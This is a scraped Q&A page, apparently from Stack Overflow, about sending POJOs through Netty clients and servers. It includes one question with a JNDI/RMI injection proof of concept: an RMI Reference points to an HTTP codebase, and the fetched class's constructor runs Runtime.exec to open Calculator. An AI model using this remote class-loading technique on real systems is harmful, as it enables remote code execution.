Why doesn't the client receive the POJO which the server sends?
this blog sample is a bit difficult for me to follow.
I realize it's a lot of code, but I don't know how to slim this down while still using a POJO, in this case Quote, between the client and server. The server sends a quote when a connection is established:
run:
[java] Aug 03, 2014 5:32:20 PM net.bounceme.dur.netty.QuoteServerInitializer <init>
[java] INFO: ..initializing..
[java] Aug 03, 2014 5:32:23 PM net.bounceme.dur.netty.QuoteServerInitializer initChannel
[java] INFO: ..adding to pipeline..
[java] Aug 03, 2014 5:32:23 PM net.bounceme.dur.netty.QuoteServerHandler <init>
[java] INFO: ..started..
[java] Aug 03, 2014 5:32:23 PM net.bounceme.dur.netty.QuoteServerHandler channelActive
[java] INFO: ..sending new server Quote..
[java] Aug 03, 2014 5:32:23 PM net.bounceme.dur.netty.QuoteEncoder encode
[java] INFO:
[java]
[java] id 0
[java] quote Where there is love there is life.
^Cthufir#dur:~/NetBeansProjects/QuoteServer$
thufir#dur:~/NetBeansProjects/QuoteServer$ ^C
thufir#dur:~/NetBeansProjects/QuoteServer$
but it never seems to arrive at the client:
run:
[java] Aug 03, 2014 5:32:23 PM net.bounceme.dur.netty.QuoteClientInitializer <init>
[java] INFO: ..initializing..
[java] Aug 03, 2014 5:32:23 PM net.bounceme.dur.netty.QuoteClientHandler channelActive
[java] INFO: ..sending new client Quote..
[java] Aug 03, 2014 5:32:23 PM net.bounceme.dur.netty.QuoteEncoder encode
[java] INFO:
[java]
[java] id 0
[java] quote client
^Cthufir#dur:~/NetBeansProjects/QuoteClient$
thufir#dur:~/NetBeansProjects/QuoteClient$
Similarly, the quote which the client sends never seems to make it to the server. Why?
server:
package net.bounceme.dur.netty;
import io.netty.bootstrap.ServerBootstrap;
import io.netty.channel.EventLoopGroup;
import io.netty.channel.nio.NioEventLoopGroup;
import io.netty.channel.socket.nio.NioServerSocketChannel;
import io.netty.handler.logging.LogLevel;
import io.netty.handler.logging.LoggingHandler;
import java.util.logging.Logger;
/**
 * Bootstraps the quote server: binds an NIO server socket on the configured
 * port and blocks until the server channel is closed.
 */
public final class QuoteServer {

    private static final Logger log = Logger.getLogger(QuoteServer.class.getName());

    public static void main(String... args) throws InterruptedException {
        MyProps props = new MyProps();
        new QuoteServer().pingPong(props.getServerPort());
    }

    private void pingPong(int port) throws InterruptedException {
        // One acceptor thread, default-sized worker pool.
        EventLoopGroup acceptors = new NioEventLoopGroup(1);
        EventLoopGroup workers = new NioEventLoopGroup();
        try {
            ServerBootstrap bootstrap = new ServerBootstrap()
                    .group(acceptors, workers)
                    .channel(NioServerSocketChannel.class)
                    .handler(new LoggingHandler(LogLevel.DEBUG))
                    .childHandler(new QuoteServerInitializer());
            // Bind, then block until the server channel closes.
            bootstrap.bind(port).sync().channel().closeFuture().sync();
        } finally {
            acceptors.shutdownGracefully();
            workers.shutdownGracefully();
        }
    }
}
server initializer:
package net.bounceme.dur.netty;
import io.netty.channel.ChannelInitializer;
import io.netty.channel.ChannelPipeline;
import io.netty.channel.socket.SocketChannel;
import io.netty.handler.codec.DelimiterBasedFrameDecoder;
import io.netty.handler.codec.Delimiters;
import java.util.logging.Logger;
public class QuoteServerInitializer extends ChannelInitializer<SocketChannel> {
private static final Logger log = Logger.getLogger(QuoteServerInitializer.class.getName());
public QuoteServerInitializer() {
log.info("..initializing..");
}
#Override
public void initChannel(SocketChannel ch) throws Exception {
log.info("..adding to pipeline..");
ChannelPipeline pipeline = ch.pipeline();
pipeline.addLast(new DelimiterBasedFrameDecoder(8192, Delimiters.lineDelimiter()));
pipeline.addLast(new QuoteDecoder());
pipeline.addLast(new QuoteEncoder());
pipeline.addLast(new QuoteServerHandler());
}
}
server handler:
package net.bounceme.dur.netty;
import io.netty.channel.ChannelHandlerContext;
import io.netty.channel.SimpleChannelInboundHandler;
import java.util.Random;
import java.util.logging.Logger;
import net.bounceme.dur.jdbc.Quote;
public class QuoteServerHandler extends SimpleChannelInboundHandler<Quote> {
private static final Logger log = Logger.getLogger(QuoteServerHandler.class.getName());
private static final Random random = new Random();
public QuoteServerHandler() {
log.info("..started..");
}
// Quotes from Mohandas K. Gandhi:
private static final String[] quotes = {
"Where there is love there is life.",
"First they ignore you, then they laugh at you, then they fight you, then you win.",
"Be the change you want to see in the world.",
"The weak can never forgive. Forgiveness is the attribute of the strong.",};
private static Quote nextQuote() {
int quoteId;
synchronized (random) {
quoteId = random.nextInt(quotes.length);
}
return new Quote(quotes[quoteId]);
}
#Override
public void channelActive(ChannelHandlerContext ctx) throws Exception {
log.info("..sending new server Quote..");
ctx.writeAndFlush(nextQuote());
}
#Override
protected void channelRead0(ChannelHandlerContext chc, Quote quote) throws Exception {
log.info(quote.toString());
chc.writeAndFlush(nextQuote());
}
#Override
public void channelRead(ChannelHandlerContext ctx, Object msg) {
log.info(msg.toString());
ctx.writeAndFlush(nextQuote());
}
#Override
public void channelReadComplete(ChannelHandlerContext ctx) {
ctx.flush();
}
}
client:
package net.bounceme.dur.netty;
import io.netty.bootstrap.Bootstrap;
import io.netty.channel.ChannelFuture;
import io.netty.channel.EventLoopGroup;
import io.netty.channel.nio.NioEventLoopGroup;
import io.netty.channel.socket.nio.NioSocketChannel;
import java.io.IOException;
import java.util.logging.Logger;
/**
 * Quote client: connects to the configured host/port and blocks until the
 * connection is closed.
 */
public final class QuoteClient {

    private static final Logger log = Logger.getLogger(QuoteClient.class.getName());

    public static void main(String... args) throws InterruptedException, IOException {
        new QuoteClient().connect();
    }

    public void connect() throws InterruptedException, IOException {
        MyProps props = new MyProps();
        pingPong(props.getHost(), props.getServerPort());
    }

    public void pingPong(String host, int port) throws InterruptedException, IOException {
        EventLoopGroup workers = new NioEventLoopGroup();
        try {
            Bootstrap bootstrap = new Bootstrap()
                    .group(workers)
                    .channel(NioSocketChannel.class)
                    .handler(new QuoteClientInitializer());
            // Connect, then block until the channel is closed.
            bootstrap.connect(host, port).sync().channel().closeFuture().sync();
        } finally {
            workers.shutdownGracefully();
        }
    }
}
client initializer:
package net.bounceme.dur.netty;
import io.netty.channel.ChannelInitializer;
import io.netty.channel.ChannelPipeline;
import io.netty.channel.socket.SocketChannel;
import io.netty.handler.codec.DelimiterBasedFrameDecoder;
import io.netty.handler.codec.Delimiters;
import java.util.logging.Logger;
public class QuoteClientInitializer extends ChannelInitializer<SocketChannel> {
private static final Logger log = Logger.getLogger(QuoteClientInitializer.class.getName());
public QuoteClientInitializer() {
log.info("..initializing..");
}
#Override
public void initChannel(SocketChannel ch) {
ChannelPipeline pipeline = ch.pipeline();
pipeline.addLast(new DelimiterBasedFrameDecoder(8192, Delimiters.lineDelimiter()));
pipeline.addLast(new QuoteDecoder());
pipeline.addLast(new QuoteEncoder());
pipeline.addLast(new QuoteClientHandler());
}
}
client handler:
package net.bounceme.dur.netty;
import io.netty.channel.ChannelHandler.Sharable;
import io.netty.channel.ChannelHandlerContext;
import io.netty.channel.SimpleChannelInboundHandler;
import java.util.logging.Logger;
import net.bounceme.dur.jdbc.Quote;
#Sharable
public class QuoteClientHandler extends SimpleChannelInboundHandler<Quote> {
private static final Logger log = Logger.getLogger(QuoteClient.class.getName());
#Override
public void channelActive(ChannelHandlerContext ctx) throws Exception {
log.info("..sending new client Quote..");
ctx.writeAndFlush(new Quote("client"));
}
#Override
protected void channelRead0(ChannelHandlerContext chc, Quote quote) throws Exception {
log.info(quote.toString());
}
#Override
public void channelRead(ChannelHandlerContext ctx, Object msg) {
log.info(msg.toString());
ctx.writeAndFlush(new Quote("client"));
}
#Override
public void channelReadComplete(ChannelHandlerContext ctx) {
ctx.fireChannelReadComplete();
}
#Override
public void exceptionCaught(ChannelHandlerContext ctx, Throwable cause) {
log.info(cause.toString());
ctx.close();
}
}
decoder:
package net.bounceme.dur.netty;
import io.netty.channel.ChannelHandlerContext;
import io.netty.handler.codec.MessageToMessageDecoder;
import java.util.List;
import java.util.logging.Logger;
import net.bounceme.dur.jdbc.Quote;
public class QuoteDecoder extends MessageToMessageDecoder<Quote> {
private static final Logger log = Logger.getLogger(QuoteDecoder.class.getName());
#Override
protected void decode(ChannelHandlerContext chc, Quote quote, List<Object> list) throws Exception {
log.info(quote.toString());
list.add(quote);
}
}
encoder:
package net.bounceme.dur.netty;
import io.netty.channel.ChannelHandlerContext;
import io.netty.handler.codec.MessageToMessageEncoder;
import java.util.List;
import java.util.logging.Logger;
import net.bounceme.dur.jdbc.Quote;
public class QuoteEncoder extends MessageToMessageEncoder<Quote> {
private static final Logger log = Logger.getLogger(QuoteEncoder.class.getName());
#Override
protected void encode(ChannelHandlerContext chc, Quote quote, List<Object> list) throws Exception {
log.info(quote.toString());
list.add(quote);
}
}
It's quite notable that the en/de-code methods never log to the console.
If you edit the channelActive method of your QuoteServerHandler to the following:
#Override
public void channelActive(ChannelHandlerContext ctx) throws Exception {
log.info("..sending new server Quote..");
ChannelFuture cf = ctx.writeAndFlush(nextQuote());
if (!cf.isSuccess()){
log.log(Level.SEVERE, cf.toString());
}
ctx.fireChannelActive();
}
then you will most probably get a message saying: unsupported message type: Quote
Your encoder needs to encode it into something that is supported. I don't know what that would be though.
I would suggest using an ObjectEncoder which could encode your Quote into a ByteBuf.
On the receiving side you need an ObjectDecoder. After that you can cast your received msg in your ClientHandler back to Quote.
Related
my java version is: 1.8.0_282
this is client:
import java.rmi.registry.*;
import javax.naming.*;
/**
 * JNDI/RMI lookup client: resolves the "Demo" binding from a local RMI
 * registry, which triggers Reference resolution on the client side.
 */
public class RegistryClient {
    public static void main(String[] args) throws Exception {
        // Opt in to loading object-factory classes from a remote codebase.
        System.setProperty("com.sun.jndi.rmi.object.trustURLCodebase", "true");
        Context ctx = new InitialContext();
        ctx.lookup("rmi://127.0.0.1:1099/Demo");
        System.out.println("done");
    }
}
this is server:
import java.rmi.registry.*;
import javax.naming.*;
import com.sun.jndi.rmi.registry.ReferenceWrapper;
/**
 * Starts a local RMI registry on port 1099 and binds a JNDI Reference whose
 * factory class is to be fetched from a remote HTTP codebase.
 */
public class RegistryServer {
    public static void main(String[] args) throws Exception {
        Registry registry = LocateRegistry.createRegistry(1099);
        // Class name "xxx", factory "RMIRegistryDemoRemote", served from
        // the HTTP codebase below.
        Reference reference = new Reference(
                "xxx",
                "RMIRegistryDemoRemote",
                "http://127.0.0.1:8000/"
        );
        ReferenceWrapper wrapper = new ReferenceWrapper(reference);
        registry.bind("Demo", wrapper);
        System.out.println("[!] server is ready");
    }
}
this is the interface and implement of RMIRegistryDemo:
import java.rmi.*;
// Remote interface for the RMI demo; implemented by RMIRegistryDemoImpl.
public interface RMIRegistryDemo extends Remote {
// Returns a greeting for the given name; declared to throw for RMI transport errors.
String sayHello(String name) throws Exception;
}
import java.rmi.server.*;
import java.rmi.*;
public class RMIRegistryDemoImpl extends UnicastRemoteObject implements RMIRegistryDemo {
public RMIRegistryDemoImpl() throws Exception {}
String id = "10";
#Override
public String sayHello(String name) {
System.out.println(id);
return "Hi, " + name;
}
}
this is the remote .class:
import java.io.IOException;
// "Gadget" class intended to be fetched from the remote HTTP codebase; its
// constructor runs as soon as the class is instantiated during JNDI
// Reference resolution.
public class RMIRegistryDemoRemote {
// SECURITY: Runtime.exec on a fixed path launches Calculator as a
// proof-of-exploit side effect; the Process handle is deliberately unused.
public RMIRegistryDemoRemote() throws IOException {
final Process process = Runtime.getRuntime().exec("/System/Applications/Calculator.app/Contents/MacOS/Calculator");
}
}
after:
run RegistryServer
deployed a web server to send RMIRegistryDemoRemote.class
run RegistryClient
the client just prints "done", and no access log in my weblog:
# overflow in ~/Downloads/test [16:16:44]
» javac RegistryClient.java && java RegistryClient
done
# overflow in ~/Downloads/test/remote [16:20:05]
» python -m http.server 8000
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
what causes it?
I'm using Netty for a server that needs to handle hundreds of thousands of requests per second while maintaining as little variance as possible on response latencies. I'm doing some final optimizations and I'm currently looking into reducing unnecessary memory allocation by reusing whatever objects I can. A simplified example of a server highlighting my issue is the following:
import io.netty.bootstrap.ServerBootstrap;
import io.netty.channel.ChannelFuture;
import io.netty.channel.ChannelInitializer;
import io.netty.channel.ChannelPipeline;
import io.netty.channel.EventLoopGroup;
import io.netty.channel.nio.NioEventLoopGroup;
import io.netty.channel.socket.SocketChannel;
import io.netty.channel.socket.nio.NioServerSocketChannel;
import io.netty.handler.codec.http.HttpServerCodec;
import io.netty.handler.codec.http.HttpObjectAggregator;
public class NettyServer {
public void run() throws Exception {
EventLoopGroup bossGroup = new NioEventLoopGroup();
EventLoopGroup workerGroup = new NioEventLoopGroup();
try {
ServerBootstrap b = new ServerBootstrap();
b.group(bossGroup, workerGroup)
.channel(NioServerSocketChannel.class)
.childHandler(new ChannelInitializer<SocketChannel>() {
#Override
public void initChannel(SocketChannel ch) throws Exception {
ChannelPipeline p = ch.pipeline();
p.addLast(new HttpServerCodec());
p.addLast(new HttpObjectAggregator(1048576));
p.addLast(new NettyHandler());
}
});
ChannelFuture f = b.bind(8080).sync();
f.channel().closeFuture().sync();
} finally {
workerGroup.shutdownGracefully();
bossGroup.shutdownGracefully();
}
}
public static void main(String[] args) throws Exception {
new NettyServer().run();
}
}
The handler code is the following:
import io.netty.buffer.Unpooled;
import io.netty.channel.ChannelFuture;
import io.netty.channel.ChannelFutureListener;
import io.netty.channel.ChannelHandlerContext;
import io.netty.channel.SimpleChannelInboundHandler;
import io.netty.handler.codec.http.DefaultFullHttpResponse;
import io.netty.handler.codec.http.FullHttpRequest;
import io.netty.handler.codec.http.FullHttpResponse;
import io.netty.handler.codec.http.HttpUtil;
import io.netty.handler.codec.http.HttpHeaderNames;
import io.netty.handler.codec.http.HttpHeaderValues;
import io.netty.handler.codec.http.HttpResponseStatus;
import io.netty.handler.codec.http.HttpVersion;
import io.netty.handler.codec.http.QueryStringDecoder;
import io.netty.util.CharsetUtil;
public class NettyHandler extends SimpleChannelInboundHandler<Object> {
private static final FullHttpResponse okResponse = OkResponse();
private static final FullHttpResponse failResponse = FailResponse();
#Override
public void channelReadComplete(ChannelHandlerContext ctx) {
ctx.flush();
}
#Override
protected void channelRead0(ChannelHandlerContext ctx, Object msg) {
FullHttpRequest request = (FullHttpRequest) msg;
QueryStringDecoder query = new QueryStringDecoder(request.getUri());
String path = query.path();
ChannelFuture f;
boolean keepAlive = HttpUtil.isKeepAlive(request);
if ("/ok".equals(path)) {
f = ctx.write(okResponse);
} else {
f = ctx.write(failResponse);
keepAlive = false;
}
if (!keepAlive) {
f.addListener(ChannelFutureListener.CLOSE);
}
}
private static FullHttpResponse OkResponse() {
String data = "{ \"status\": ok }";
FullHttpResponse response = new DefaultFullHttpResponse(
HttpVersion.HTTP_1_1,
HttpResponseStatus.OK,
Unpooled.copiedBuffer(data, CharsetUtil.UTF_8)
);
response.headers().set(HttpHeaderNames.CONTENT_TYPE, HttpHeaderValues.APPLICATION_JSON);
response.headers().set(HttpHeaderNames.CACHE_CONTROL, "max-age=0, no-cache, must-revalidate, proxy-revalidate");
return response;
}
private static FullHttpResponse FailResponse() {
String data = "{ \"status\": fail }";
FullHttpResponse response = new DefaultFullHttpResponse(
HttpVersion.HTTP_1_1,
HttpResponseStatus.OK,
Unpooled.copiedBuffer(data, CharsetUtil.UTF_8)
);
response.headers().set(HttpHeaderNames.CONTENT_TYPE, HttpHeaderValues.APPLICATION_JSON);
response.headers().set(HttpHeaderNames.CACHE_CONTROL, "max-age=0, no-cache, must-revalidate, proxy-revalidate");
return response;
}
}
The handler shows what I'm trying to accomplish. The handler contains static instances of fixed HTTP responses. For the server all responses except error codes come from a small group and can be preconstructed. With the above code the second query to a handler will fail, since Netty's ref counts for the response has gone down to zero. I was expecting that just calling retain() on the object would be enough, but it doesn't look like it is.
What would be the most efficient way to reuse the HTTP response objects between requests?
You should call retainedDuplicate() as otherwise the readerIndex etc may become “invalid”
For right now, the client instantiates the Swing GUI. This seems to work, to a degree.
What's the correct flow to allow messages to get passed to, and received from, the GUI?
In the GUI, which extends JFrame for convenience:
// Swing action callback: replaces the current title with a fresh Title.
// NOTE(review): the new Title is only stored in a field; nothing here hands
// it to the Netty client — presumably that wiring is the open question.
private void nextTitleActionPerformed(java.awt.event.ActionEvent evt) {//GEN-FIRST:event_nextTitleActionPerformed
title = new Title();
}//GEN-LAST:event_nextTitleActionPerformed
how do I pass that title through netty, that is, to the ClientHandler, so that this object is sent from the client to the server?
I toyed with starting the Client and ClientHandler from within the GUI directly, but there's no real "instance" of ClientHandler to invoke method calls on.
Perhaps there's a Netty helper or interface which the Swing GUI can pass methods through? I've read a bit of a book on netty, but that book doesn't seem to address this topic. (Hmm, I'll take another look at the appendix, it has some demo's.)
client code:
package net.bounceme.dur.client.netty;
import io.netty.bootstrap.Bootstrap;
import io.netty.channel.ChannelInitializer;
import io.netty.channel.ChannelPipeline;
import io.netty.channel.EventLoopGroup;
import io.netty.channel.nio.NioEventLoopGroup;
import io.netty.channel.socket.SocketChannel;
import io.netty.channel.socket.nio.NioSocketChannel;
import io.netty.handler.codec.serialization.ClassResolvers;
import io.netty.handler.codec.serialization.ObjectDecoder;
import io.netty.handler.codec.serialization.ObjectEncoder;
import java.util.logging.Logger;
import javax.net.ssl.SSLException;
import net.bounceme.dur.client.gui.TitlesGUI;
public final class Client {
private static final Logger log = Logger.getLogger(Client.class.getName());
private final TitlesGUI gui = new TitlesGUI();
public Client() {
}
public static void main(String... args) throws InterruptedException, SSLException {
MyProps p = new MyProps();
String host = p.getHost();
int port = p.getServerPort();
new Client().startClient(host, port);
}
public void startClient(final String host, final int port) throws SSLException, InterruptedException {
gui.setVisible(true);
EventLoopGroup group = new NioEventLoopGroup();
try {
Bootstrap b = new Bootstrap();
b.group(group)
.channel(NioSocketChannel.class)
.handler(new ChannelInitializer<SocketChannel>() {
#Override
public void initChannel(SocketChannel ch) throws Exception {
ChannelPipeline p = ch.pipeline();
p.addLast(
new ObjectEncoder(),
new ObjectDecoder(ClassResolvers.cacheDisabled(null)),
new ClientHandler());
}
});
b.connect(host, port).sync().channel().closeFuture().sync();
} finally {
group.shutdownGracefully();
}
}
}
handler code:
package net.bounceme.dur.client.netty;
import io.netty.channel.ChannelHandlerContext;
import io.netty.channel.SimpleChannelInboundHandler;
import java.util.logging.Logger;
import net.bounceme.dur.client.jdbc.Title;
public class ClientHandler extends SimpleChannelInboundHandler<Title> {
private static final Logger log = Logger.getLogger(ClientHandler.class.getName());
public ClientHandler() {
}
#Override
public boolean acceptInboundMessage(Object msg) throws Exception {
return true;
}
#Override
public void channelRead(ChannelHandlerContext ctx, Object msg) throws Exception {
log.info(msg.toString());
ctx.write(new Title());
}
#Override
protected void channelRead0(ChannelHandlerContext chc, Title title) throws Exception {
log.info(title.toString());
chc.write(new Title());
}
}
server output:
BUILD SUCCESSFUL
Total time: 3 seconds
Jul 26, 2014 8:10:24 PM io.netty.handler.logging.LoggingHandler channelRegistered
INFO: [id: 0x15d5077e] REGISTERED
Jul 26, 2014 8:10:24 PM io.netty.handler.logging.LoggingHandler bind
INFO: [id: 0x15d5077e] BIND(0.0.0.0/0.0.0.0:4454)
Jul 26, 2014 8:10:24 PM io.netty.handler.logging.LoggingHandler channelActive
INFO: [id: 0x15d5077e, /0:0:0:0:0:0:0:0:4454] ACTIVE
Jul 26, 2014 8:13:31 PM io.netty.handler.logging.LoggingHandler logMessage
INFO: [id: 0x15d5077e, /0:0:0:0:0:0:0:0:4454] RECEIVED: [id: 0xbcbabb1e, /127.0.0.1:34604 => /127.0.0.1:4454]
^Cthufir#dur:~/NetBeansProjects/AgentServer$
thufir#dur:~/NetBeansProjects/AgentServer$
The server seems to acknowledge a connection from the client (and can send and receive with a headless version).
The question is:
how do I send objects to the GUI, or get objects from the GUI? The TitlesGUI class extends JFrame.
I want to modify the client handler to use Foo instead of Datagram -- what changes are required in the client itself?
Surely it's not necessary to strictly keep to datagrams to send and receive with Netty? The Factorial example uses BigInteger, so, surely, it's possible to use POJO's.
Any and all attempts to create a class like:
class FooClientHandler extends SimpleChannelInboundHandler<Foo> are just non-starters for me, it literally won't send or receive with a server. (Yes, both client and server use similar handlers, generic classes with Foo.) So, I'm coming at this now from working code.
What's the key distinction between the factorial handler and the datagram handler below? Or, is the primary distinction in how it's used in the client?
client:
package net.bounceme.dur.netty;
import io.netty.bootstrap.Bootstrap;
import io.netty.buffer.Unpooled;
import io.netty.channel.Channel;
import io.netty.channel.ChannelOption;
import io.netty.channel.EventLoopGroup;
import io.netty.channel.nio.NioEventLoopGroup;
import io.netty.channel.socket.DatagramPacket;
import io.netty.channel.socket.nio.NioDatagramChannel;
import io.netty.util.CharsetUtil;
import java.net.InetSocketAddress;
import java.util.logging.Logger;
import net.bounceme.dur.client.gui.MyProps;
/**
 * UDP quote client: binds an ephemeral datagram channel, sends a "QOTM?"
 * probe to the server, and waits up to five seconds for the conversation
 * to finish.
 */
public final class Client {

    private static final Logger log = Logger.getLogger(Client.class.getName());

    public void connect() throws InterruptedException {
        MyProps props = new MyProps();
        pingPongDatagram(props.getHost(), props.getServerPort());
    }

    public void pingPongDatagram(String host, int port) throws InterruptedException {
        EventLoopGroup group = new NioEventLoopGroup();
        try {
            Bootstrap bootstrap = new Bootstrap()
                    .group(group)
                    .channel(NioDatagramChannel.class)
                    .option(ChannelOption.SO_BROADCAST, true)
                    .handler(new DatagramClientHandler());
            Channel channel = bootstrap.bind(0).sync().channel();
            DatagramPacket probe = new DatagramPacket(
                    Unpooled.copiedBuffer("QOTM?", CharsetUtil.UTF_8),
                    new InetSocketAddress(host, port));
            channel.writeAndFlush(probe).sync();
            log.info("wrote packet");
            // Give the server five seconds to close the conversation.
            if (!channel.closeFuture().await(5000)) {
                log.warning("server timed out");
            }
        } finally {
            group.shutdownGracefully();
        }
    }
}
handler:
package net.bounceme.dur.netty;
import io.netty.buffer.Unpooled;
import io.netty.channel.ChannelHandlerContext;
import io.netty.channel.SimpleChannelInboundHandler;
import io.netty.channel.socket.DatagramPacket;
import io.netty.util.CharsetUtil;
import java.net.InetSocketAddress;
import java.util.logging.Logger;
public class DatagramClientHandler extends SimpleChannelInboundHandler<DatagramPacket> {
private static final Logger log = Logger.getLogger(DatagramClientHandler.class.getName());
#Override
public void channelRead0(ChannelHandlerContext ctx, DatagramPacket msg) throws Exception {
String response = msg.content().toString(CharsetUtil.UTF_8);
log.info(response);
DatagramPacket foo = new DatagramPacket(
Unpooled.copiedBuffer("QOTM?", CharsetUtil.UTF_8),
new InetSocketAddress("localhost", 4454));
ctx.writeAndFlush(foo);
}
#Override
public void exceptionCaught(ChannelHandlerContext ctx, Throwable cause) {
log.severe(cause.toString());
ctx.close();
}
}
I omitted the server code, it's almost exactly as in the Ghandi quote example.
What changes do I need to make to the client so that the handler can use Foo instead of DatagramPacket?
All I can say with certainty is that this client:
package net.bounceme.dur.netty;
import io.netty.bootstrap.Bootstrap;
import io.netty.buffer.Unpooled;
import io.netty.channel.Channel;
import io.netty.channel.ChannelOption;
import io.netty.channel.EventLoopGroup;
import io.netty.channel.nio.NioEventLoopGroup;
import io.netty.channel.socket.DatagramPacket;
import io.netty.channel.socket.nio.NioDatagramChannel;
import io.netty.util.CharsetUtil;
import java.net.InetSocketAddress;
import java.util.logging.Logger;
import net.bounceme.dur.client.gui.MyProps;
import net.bounceme.dur.client.jdbc.Title;
/**
 * UDP client variant using TitleClientHandler: sends a "QOTM?" probe and a
 * bare Title, then waits up to five seconds for the channel to close.
 */
public final class Client {

    private static final Logger log = Logger.getLogger(Client.class.getName());

    public void connect() throws InterruptedException {
        MyProps props = new MyProps();
        pingPongDatagram(props.getHost(), props.getServerPort());
    }

    public void pingPongDatagram(String host, int port) throws InterruptedException {
        EventLoopGroup group = new NioEventLoopGroup();
        try {
            Bootstrap bootstrap = new Bootstrap()
                    .group(group)
                    .channel(NioDatagramChannel.class)
                    .option(ChannelOption.SO_BROADCAST, true)
                    .handler(new TitleClientHandler());
            Channel channel = bootstrap.bind(0).sync().channel();
            channel.writeAndFlush(new DatagramPacket(
                    Unpooled.copiedBuffer("QOTM?", CharsetUtil.UTF_8),
                    new InetSocketAddress(host, port))).sync();
            // NOTE(review): a raw Title is not a DatagramPacket, and no
            // encoder is installed — presumably this write fails with
            // "unsupported message type"; confirm against the error logs.
            channel.writeAndFlush(new Title());
            log.info("wrote packets");
            if (!channel.closeFuture().await(5000)) {
                log.warning("server timed out");
            }
        } finally {
            group.shutdownGracefully();
        }
    }
}
and handler:
package net.bounceme.dur.netty;
import io.netty.channel.ChannelHandlerContext;
import io.netty.channel.SimpleChannelInboundHandler;
import java.util.logging.Logger;
import net.bounceme.dur.client.jdbc.Title;
public class TitleClientHandler extends SimpleChannelInboundHandler<Title> {
private static final Logger log = Logger.getLogger(TitleClientHandler.class.getName());
#Override
public void exceptionCaught(ChannelHandlerContext ctx, Throwable cause) {
log.severe(cause.toString());
ctx.close();
}
#Override
protected void channelRead0(ChannelHandlerContext chc, Title title) throws Exception {
log.info(title.toString());
}
}
don't, seemingly, communicate at all with the server -- even when the server has been modified accordingly.
Unfortunately, I don't understand this output from the netty server:
BUILD SUCCESSFUL
Total time: 3 seconds
Jul 27, 2014 2:04:44 AM io.netty.handler.logging.LoggingHandler channelRegistered
INFO: [id: 0xcad25a31] REGISTERED
Jul 27, 2014 2:04:44 AM io.netty.handler.logging.LoggingHandler bind
INFO: [id: 0xcad25a31] BIND(0.0.0.0/0.0.0.0:4454)
Jul 27, 2014 2:04:44 AM io.netty.handler.logging.LoggingHandler channelActive
INFO: [id: 0xcad25a31, /0:0:0:0:0:0:0:0:4454] ACTIVE
Jul 27, 2014 2:04:59 AM io.netty.handler.logging.LoggingHandler logMessage
INFO: [id: 0xcad25a31, /0:0:0:0:0:0:0:0:4454] RECEIVED: [id: 0xff40b8a2, /127.0.0.1:37558 => /127.0.0.1:4454]
Jul 27, 2014 2:04:59 AM net.bounceme.dur.netty.ServerHandler <init>
INFO: starting..
Jul 27, 2014 2:04:59 AM io.netty.channel.DefaultChannelPipeline$TailContext exceptionCaught
WARNING: An exceptionCaught() event was fired, and it reached at the tail of the pipeline. It usually means the last handler in the pipeline did not handle the exception.
io.netty.handler.codec.TooLongFrameException: Adjusted frame length exceeds 1048576: 2901213193 - discarded
at io.netty.handler.codec.LengthFieldBasedFrameDecoder.fail(LengthFieldBasedFrameDecoder.java:501)
at io.netty.handler.codec.LengthFieldBasedFrameDecoder.failIfNecessary(LengthFieldBasedFrameDecoder.java:477)
at io.netty.handler.codec.LengthFieldBasedFrameDecoder.decode(LengthFieldBasedFrameDecoder.java:403)
at io.netty.handler.codec.serialization.ObjectDecoder.decode(ObjectDecoder.java:68)
at io.netty.handler.codec.LengthFieldBasedFrameDecoder.decode(LengthFieldBasedFrameDecoder.java:343)
at io.netty.handler.codec.ByteToMessageDecoder.callDecode(ByteToMessageDecoder.java:241)
at io.netty.handler.codec.ByteToMessageDecoder.channelRead(ByteToMessageDecoder.java:149)
at io.netty.channel.AbstractChannelHandlerContext.invokeChannelRead(AbstractChannelHandlerContext.java:333)
at io.netty.channel.AbstractChannelHandlerContext.fireChannelRead(AbstractChannelHandlerContext.java:319)
at io.netty.channel.DefaultChannelPipeline.fireChannelRead(DefaultChannelPipeline.java:787)
at io.netty.channel.nio.AbstractNioByteChannel$NioByteUnsafe.read(AbstractNioByteChannel.java:125)
at io.netty.channel.nio.NioEventLoop.processSelectedKey(NioEventLoop.java:511)
at io.netty.channel.nio.NioEventLoop.processSelectedKeysOptimized(NioEventLoop.java:468)
at io.netty.channel.nio.NioEventLoop.processSelectedKeys(NioEventLoop.java:382)
at io.netty.channel.nio.NioEventLoop.run(NioEventLoop.java:354)
at io.netty.util.concurrent.SingleThreadEventExecutor$2.run(SingleThreadEventExecutor.java:116)
at io.netty.util.concurrent.DefaultThreadFactory$DefaultRunnableDecorator.run(DefaultThreadFactory.java:137)
at java.lang.Thread.run(Thread.java:744)
^Cthufir#dur:~/NetBeansProjects/AgentServer$
thufir#dur:~/NetBeansProjects/AgentServer$
Presumably the netty-based server is complaining that it's receiving bad data in some respect?
client code:
package net.bounceme.dur.client.gui;
import java.io.IOException;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.net.Socket;
import java.util.logging.FileHandler;
import java.util.logging.Handler;
import java.util.logging.Level;
import java.util.logging.Logger;
import java.util.logging.SimpleFormatter;
import net.bounceme.dur.client.jdbc.Title;
public final class ApplicationDriver {
private static final Logger log = Logger.getLogger(ApplicationDriver.class.getName());
private TitlesGUI gui = null;
private Handler handler = null;
public ApplicationDriver() throws IOException, ClassNotFoundException {
handler = new FileHandler("application.log");
handler.setFormatter(new SimpleFormatter());
log.setLevel(Level.INFO);
log.addHandler(handler);
log.info("starting log..");
MyProps p = new MyProps();
String host = p.getHost();
int port = p.getServerPort();
guiThread();
readWrite(host, port);
}
private void guiThread() {
Thread g;
g = new Thread() {
#Override
public void run() {
try {
gui = new TitlesGUI();
} catch (IOException ex) {
log.severe(ex.toString());
}
gui.setVisible(true);
}
};
g.start();
}
public static void main(String... args) throws IOException, ClassNotFoundException {
new ApplicationDriver();
}
private void readWrite(final String host, final int port) throws IOException {
Thread inputOutput;
final Socket socket = new Socket(host, port);
inputOutput = new Thread() {
#Override
public void run() {
while (true) {
try (ObjectOutputStream objectOutputStream = new ObjectOutputStream(socket.getOutputStream());
ObjectInputStream objectInputStream = new ObjectInputStream(socket.getInputStream())) {
gui.setTitle((Title) objectInputStream.readObject());
Thread.sleep(1000);
} catch (IOException | ClassNotFoundException | InterruptedException ex) {
log.severe(ex.toString());
}
}
}
};
inputOutput.start();
}
}
is it a problem that the client is using regular sockets instead of netty? Both on the client and server side POJO's are being sent. (The Title class is serializable and the serialVersionUID values match up.)
